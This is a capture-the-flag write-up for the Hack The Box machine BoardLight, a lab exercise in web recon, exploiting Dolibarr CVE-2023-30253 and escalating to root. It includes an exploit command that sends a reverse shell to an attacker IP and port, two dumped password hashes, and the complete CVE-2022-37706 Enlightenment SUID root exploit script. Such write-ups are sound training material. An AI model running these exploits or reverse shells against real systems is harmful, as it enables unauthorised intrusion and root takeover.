BoardLight HTB

We have access to a basic website, after some recon there is not a much to exploit directly on the website. The form is not linked to anything, it just sends a GET request. Other user input are not vulnerable as well.

We can do more reconnaissance on the web server. Nmap didn't give us any useful information, so we can enumerate hidden directories and files with Gobuster. There are many ways to use Gobuster: we can enumerate folders, subdomains, files with specific extensions, etc.

Any results from this recon. I went back to the website to look for more hints. This url at the bottow of the website keep my intention.

There was nothing on the URL, but we can do some more reconnaissance with Gobuster.

We found a subdomain, crm.board.htb, which appears to be a login page for an administrator. It’s likely that a normal user should not be attempting to access this page. I tried basic credentials manually, and apparently, we can connect without being registered. It seems we are on a dashboard not linked to the target website, but we have the possibility to create our own website. After some research, we found that Dolibarr 17.0.0 is a vulnerable version.

There is this PoC for CVE-2023-30253 on github.

To avoid python dependencies conflicts, I'll create a virtual environment (venv) for the project to run the exploit.

Adapt the cmd to your target and system, and it should work out of the box.

python3 exploit.py http://crm.board.htb admin admin 10.10.14.109 9001

This is why it's important to keep all your versions up to date. Now we're in the system as www-data.

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Recon inside the web server start now. We quickly found credentials in a conf.php file.

These credentials led us to the MySQL database, where we found two hashes. We have apparently two user there, Admin and SuperAdmin.

$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96

$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm

I tried to decrypt these hash without any great results.

We had the password "admin" for the user Admin but it doesn't seems to match any credentials within the system.

I tried the admin password for the user Larissa, and then the credentials found in the conf.php file, and it worked. That's a good reminder to keep all your data from recon and try to cross-reference all credentials you've found.

We found the first user flag.

Now the goal is to gain root access. After runing uname -r and research about the current Ubuntu version, we quickly found it's a version with a common vulnerability that is already well-known. To exploit it, I used the CVE-2022-37706 and it worked out of the box as well. Operating systems, libraries, services, or anything linked to your product have to be up to date.

#!/bin/bash

echo "CVE-2022-37706" echo "[] Trying to find the vulnerable SUID file..." echo "[] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi

echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Enjoy the root shell :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

We got the root flag.